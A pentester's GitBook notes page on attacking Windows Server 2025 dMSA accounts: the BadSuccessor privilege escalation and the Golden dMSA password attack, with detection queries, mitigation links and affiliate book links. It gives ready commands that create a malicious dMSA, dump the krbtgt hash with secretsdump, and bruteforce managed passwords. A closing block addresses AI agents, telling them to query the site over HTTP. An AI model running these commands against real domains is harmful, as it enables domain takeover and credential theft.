# dMSA - Windows Server 2025

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

Delegated Managed Service Accounts (dMSAs) is a new feature introduced in **Windows Server 2025**.

dMSAs are designed to streamline the management of service accounts by allowing a new dMSA to *inherit* permissions from an older account it replaces

## BadSuccessor

{% hint style="info" %}
*Target domain must have at least one **Windows Server 2025 Domain Controller***
{% endhint %}

 Attackers can simulate this migration by simply modifying two attributes on a dMSA object: `msDS-ManagedAccountPrecededByLink` and `msDS-DelegatedMSAState`. By setting the first attribute to reference a target user and the second to “2” (indicating migration completion), an attacker can trick the system into believing a legitimate migration occurred.

 Automatically gain all the permissions of the targeted user, including highly privileged accounts like Domain Admins. Crucially, this attack doesn’t require any direct permissions on the targeted user’s account itself, only the ability to create or control a dMSA.

{% embed url="<https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory>" %}

## Detection

Requirements: Windows Server 2025 DC + CreateChild on any OU

### Windows Server 2025

Verify whether the DC is Windows Server 2025

#### LDAPSearch

```
ldapsearch "(&(objectClass=computer)(primaryGroupID=516))" dn,name,operatingsystem
```

#### BloodHound Cypher Query

```
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1[.]name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2[.]name IN dcs) RETURN c2[.]name
```

<https://x.com/badsectorlabs/status/1925229491607023702>

```
MATCH (c:Computer)
WHERE c.isdc = true AND c.operatingsystem CONTAINS "2025"
RETURN c.name
```

### CreateChild permission on any OU

#### BloodHound

```
MATCH (u:User {name: "USERNAME@DOMAIN.LOCAL"})-[r]->(ou:OU)
RETURN type(r) AS edge_type, r.rightname AS permission, ou.name AS organizational_unit
```

#### PowerView

```
Get-DomainObjectACL -Identity "OU=GroupName,DC=DOMAIN,DC=local" -ResolveGUIDs -Where 'AccessMask contains CreateChild' -Where 'SecurityIdentifier contains username'
```

### BadSuccessor.ps1

{% embed url="<https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1>" %}

```
BadSuccessor -mode check -Domain evilcorp.local 
```

<figure><img src="/files/Uep4aXquYGp4R2dwx5wG" alt=""><figcaption></figcaption></figure>

```
BadSuccessor -mode exploit -Path "CN=Users,DC=otrf,DC=local" -Name "sus_dMSA" -DelegatedAdmin "j.taylor" -DelegateTarget "svcAccount06" -domain "otrf.local"
```

### BadSuccessor

Identify **which identities have permissions** to create dMSAs in the domain, and **which OUs are affected** - highlighting where the BadSuccessor attack could be executed

{% embed url="<https://github.com/akamai/BadSuccessor>" %}

## Proof of Concept (Poc)

### NetExec

```
nxc ldap [IP] -u administrator -p password -M badsuccessor
```

<figure><img src="/files/j255CMcrLoWVs9LgChBH" alt=""><figcaption></figcaption></figure>

<https://x.com/mpgn_x64/status/1925935365744951350>

### Rubeus

{% embed url="<https://github.com/GhostPack/Rubeus/pull/194>" %}

### SharpSuccessor - .NET

{% embed url="<https://github.com/logangoins/SharpSuccessor>" %}

### BadSuccessor - Powershell&#x20;

{% embed url="<https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1>" %}

### PowerView\.py dev branch - Python

{% embed url="<https://github.com/aniqfakhrul/powerview.py/tree/dev>" %}

<figure><img src="/files/0km8oZ1C0vh9ODsdBkUM" alt=""><figcaption></figcaption></figure>

{% embed url="<https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187>" %}

### BadSuccessor - Python&#x20;

{% embed url="<https://github.com/cybrly/badsuccessor>" %}

### BloodyAD - Python

{% embed url="<https://github.com/CravateRouge/bloodyAD/releases/tag/v2.1.14>" %}

```
$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' get writable --otype OU --right CHILD
$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' get writable --otype OU
$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' add badSuccessir dmsADM10
$ export KRB5CCNAME=dmsADM10_wT.ccache
$ secretsdump.py 'bloody.corp/dmsADM10$@DC2025.bloody.corp' -k -no-pass -just-dc -user bloody\\krbtgt -dc-ip 192.18.100.5 -target-ip 192.168.100.5
```

## Mitigation

{% embed url="<https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/>" %}

{% embed url="<https://academy.bluraven.io/blog/detecting-badsuccessor>" %}

* Set 3 deny ACEs on OUs to prevent DMSA abuse.

{% embed url="<https://github.com/JimSycurity/dMSAs>" %}

* Disable Implicit Owner Rights

{% embed url="<https://support.microsoft.com/en-us/topic/kb5008383-active-directory-permissions-updates-cve-2021-42291-536d5555-ffba-4248-a60e-d6cbc849cde1>" %}

* Don’t have a KDS Root Key - Check for KDS

{% embed url="<https://learn.microsoft.com/en-us/powershell/module/kds/get-kdsrootkey?view=windowsserver2025-ps>" %}

## Golden dMSA

{% embed url="<https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/>" %}

The Golden dMSA attack enables attackers to **bypass authentication and generate passwords** for all dMSAs and gMSAs and their associated service accounts.

{% embed url="<https://github.com/Semperis/GoldenGMSA>" %}

&#x20;Obtain dMSAs from `root.test.\gmsa.exe`

```
gmsa.exe kds --domain child.root.test
```

<figure><img src="/files/0Xh5UdRxyyVzxrPpknF0" alt=""><figcaption></figcaption></figure>

```
gmsa.exe info -u weak -p password -d root.test -o child.root.test
```

<figure><img src="/files/XeUyt8CpMKtNZvxoof3C" alt=""><figcaption></figcaption></figure>

Create a wordlist that will be used for the managedPasswordIss bruteforce attack

```
gmsa.exe wordlist -s "SID" -d root.test -f root.test -k "output"
```

<figure><img src="/files/Fgj4cIe9dZ24CDnVkJCv" alt=""><figcaption></figcaption></figure>

Bruteforce

```
gmsa.exe bruteforce -s "domain_SID" -d root.test -i "output" -u dmsa$ -k "base64_blob"
```

<figure><img src="/files/gLrizGccZi136t41zahi" alt=""><figcaption></figcaption></figure>

## Interesting Book

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}

* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
  Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
  Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
  A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
  The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
  A practical guide to building a penetration testing program having homefield advantage

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/dmsa-windows-server-2025.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.